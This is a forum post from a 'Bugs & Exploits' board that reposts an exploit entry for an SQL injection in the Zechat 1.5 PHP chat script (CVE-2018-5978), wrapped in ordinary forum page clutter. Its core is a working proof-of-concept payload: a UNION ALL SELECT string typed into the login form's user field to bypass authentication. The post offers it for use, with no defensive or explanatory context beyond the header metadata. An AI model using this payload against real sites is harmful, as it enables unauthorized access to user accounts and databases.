Bugs & Exploits

Locked Facebook Style Php Ajax Chat - Zechat 1.5 - SQL Injection

dEEpEst · 2018-02-28T23:49:19+0000

[HIDE-THANKS]# # # # # # Exploit Title: Facebook Style Php Ajax Chat - Zechat 1.5 - SQL Injection # Dork: N/A # Date: 23.01.2018 # Vendor Homepage: This is the hidden content, please Sign In or Sign Up # Software Link: This is the hidden content, please Sign In or Sign Up # Version: 1.5 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-5978 # # # # # # Exploit Author: Ihsan Sencan # Author Web: This is the hidden content, please Sign In or Sign Up # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # 1) # http://localhost/[PATH]/login.php # # User: ' UNION ALL SELECT 0x31,0x32,0x33,concat(0x63)-- A # Pass: anything # # # # # #[/HIDE-THANKS]

By dEEpEst
February 28, 2018 in Bugs & Exploits

Followers 0

Start new topic

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.

Sign In

Locked Facebook Style Php Ajax Chat - Zechat 1.5 - SQL Injection

Recommended Posts

dEEpEst

Link to comment

Share on other sites

Browse

Activity

Store

Important Information